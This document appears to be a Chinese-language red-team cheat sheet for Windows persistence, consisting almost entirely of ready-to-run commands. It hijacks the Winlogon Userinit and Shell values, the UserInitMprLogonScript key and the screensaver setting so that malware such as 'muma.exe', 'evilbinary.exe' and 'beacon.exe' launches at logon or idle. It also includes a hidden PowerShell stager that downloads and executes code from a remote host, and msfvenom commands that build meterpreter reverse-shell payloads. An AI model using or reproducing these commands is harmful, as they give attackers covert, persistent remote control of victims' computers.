计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon下添加Userinit值
>Powershell.exe Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon" -name Userinit -value "C:\Windows\system32\userinit.exe,c:\muma.exe"
计算机\HKEY_CURRENT_USER\Environment
创建键值UserInitMprLogonScript值为c:\muma.exe
&
Powershell实现：
>Set-ExecutionPolicy RemoteSigned 
保存ps1执行
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon" -name Userinit -value "C:\Windows\system32\userinit.exe,powershell.exe -nop -w hidden -c $w=new-object net.webclient;$w.proxy=[Net.WebRequest]::GetSystemWebProxy();$w.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $w.downloadstring('http://192.168.2.11:8080/kaMhC1');"
# powershell反弹shell的payload参照msf中的web_delivery模块

>msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe > evilbinary.exe
>msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f dll > evilbinary.dll

>reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, evilbinary.exe" /f
>reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "explorer.exe, evilbinary.exe" /f
>Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, evilbinary.exe" -Force
>Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, evilbinary.exe" -Force

计算机\HKEY_CURRENT_USER\Control Panel\Desktop
SCRNSAVE.EXE - 默认屏幕保护程序，改为恶意程序(设置备份)
ScreenSaveActive - 1表示屏幕保护是启动状态，0表示表示屏幕保护是关闭状态
ScreenSaverTimeout - 指定屏幕保护程序启动前系统的空闲事件，单位为秒，默认为900（15分钟）

>reg add "hkcu\control panel\desktop" /v SCRNSAVE.EXE /d C:\Users\hunter\Desktop\beacon.exe /f
>reg add "hkcu\control panel\desktop" /v ScreenSaveActive /d 1 /f
>reg add "hkcu\control panel\desktop" /v ScreenSaverIsSecure /d 0 /f
>reg add "hkcu\control panel\desktop" /v ScreenSaveTimeOut /d 60 /f